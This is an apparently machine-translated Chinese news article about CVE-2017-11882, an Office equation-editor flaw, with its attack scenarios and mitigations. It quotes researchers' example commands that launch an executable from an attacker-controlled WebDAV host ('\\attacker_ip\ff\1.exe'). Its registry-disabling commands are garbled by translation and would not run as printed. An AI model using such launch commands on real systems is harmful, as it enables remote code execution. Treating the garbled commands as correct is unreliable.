17年前的微软Office漏洞让黑客在没有用户交互的情况下安装恶意软件

当世界仍在应对“未修补”的Microsoft Office内置DDE功能的威胁时，研究人员发现了另一个Office组件的严重问题，该组件可能允许攻击者在目标计算机上远程安装恶意软件。

该漏洞是一个内存损坏问题，存在于过去17年中发布的所有版本的Microsoft Office中，包括Microsoft Office 365，并且适用于所有版本的Windows操作系统，包括最新的Microsoft Windows 10 Creators更新。
Embedi的安全研究人员发现，该漏洞会导致远程代码执行，允许未经验证的远程攻击者在打开恶意文档后在目标系统上执行恶意代码，而无需用户交互。

该漏洞被识别为CVE-2017-11882，存在于EQNEDT32中。EXE，一个MS Office组件，负责在文档中插入和编辑公式（OLE对象）。

但是，由于不正确的内存操作，该组件无法正确处理内存中的对象，从而导致其损坏，攻击者可能会在登录用户的上下文中执行恶意代码。

17年前，EQNEDT32。EXE是在Microsoft Office 2000中引入的，并保留在Microsoft Office 2007之后发布的所有版本中，以确保该软件与旧版本的文档保持兼容。

演示：利用此漏洞可以让整个系统接管

当与Windows内核权限提升漏洞（如CVE-2017-11847）结合使用时，可以利用此漏洞完全控制系统。

可能的攻击场景：

在解释漏洞的范围时，Embedai研究人员提出了以下几种攻击场景：

“通过插入几个利用所述漏洞的OLE，可以执行任意序列的命令（例如，从Internet下载任意文件并执行它）”。
“执行任意代码的最简单方法之一是从攻击者控制的WebDAV服务器启动可执行文件”。

“尽管如此，攻击者仍可以使用所述漏洞执行cmd.exe/c start\\attacker\u ip\ff等命令。此类命令可作为攻击的一部分，并触发启动WebClient”。

“在此之后，攻击者可以使用\\attacker_ip\ff\1.exe命令从WebDAV服务器启动可执行文件。可执行文件的启动机制与\\live.sysinternals.com\tools服务类似”。

针对Microsoft Office漏洞的保护

随着本月的补丁发布，微软通过改变受影响软件处理内存中对象的方式，解决了这个漏洞。

因此，强烈建议用户尽快应用11月份的安全补丁，以防止黑客和网络犯罪分子控制他们的计算机。

由于该组件存在许多容易被利用的安全问题，因此禁用它可能是确保系统安全的最佳方法。

用户可以在命令提示符下运行以下命令，以禁用在Windows注册表中注册组件：

reg添加“HKLM\SOFTWARE\Microsoft\Office\Common\COM兼容性\{0002CE02-0000-0000-C000-0000000000 46}”/v“兼容性标志”/t reg\U DWORD/d 0x400

对于x64操作系统中的32位Microsoft Office软件包，请运行以下命令：

reg添加“HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM兼容性\{0002CE02-0000-0000-C000-0000000000 46}”/v“兼容性标志”/t reg_DWORD/d 0x400

除此之外，用户还应启用受保护视图（Microsoft Office sandbox），以防止活动内容执行（OLE/ActiveX/Macro）。